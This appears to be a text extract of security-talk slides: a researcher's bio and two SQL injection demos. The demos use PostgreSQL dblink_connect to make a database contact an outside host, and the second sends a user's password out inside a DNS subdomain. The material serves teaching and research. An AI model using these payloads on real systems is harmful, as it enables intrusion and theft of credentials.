2. whoami
Security Researcher @ Netsparker Ltd.
Developer @ Another Times
Writer @ Ethical Hacking “Offensive & Defensive” Book
Blog: omercitak.com
All Social Platform: @Om3rCitak
19. demo
SELECT *
FROM users
WHERE (username like '% '||
cast(SELECT(dblink_connect('host=test.omercitak.net user=a password=a
connect_timeout=2')) as numeric)
||'%')
20. demo
SELECT *
FROM users
WHERE (username like '% '||
cast(SELECT(dblink_connect('host='||(select password from users where
id=7)||'.omercitak.net user=a password=a connect_timeout=2')) as numeric)
||'%')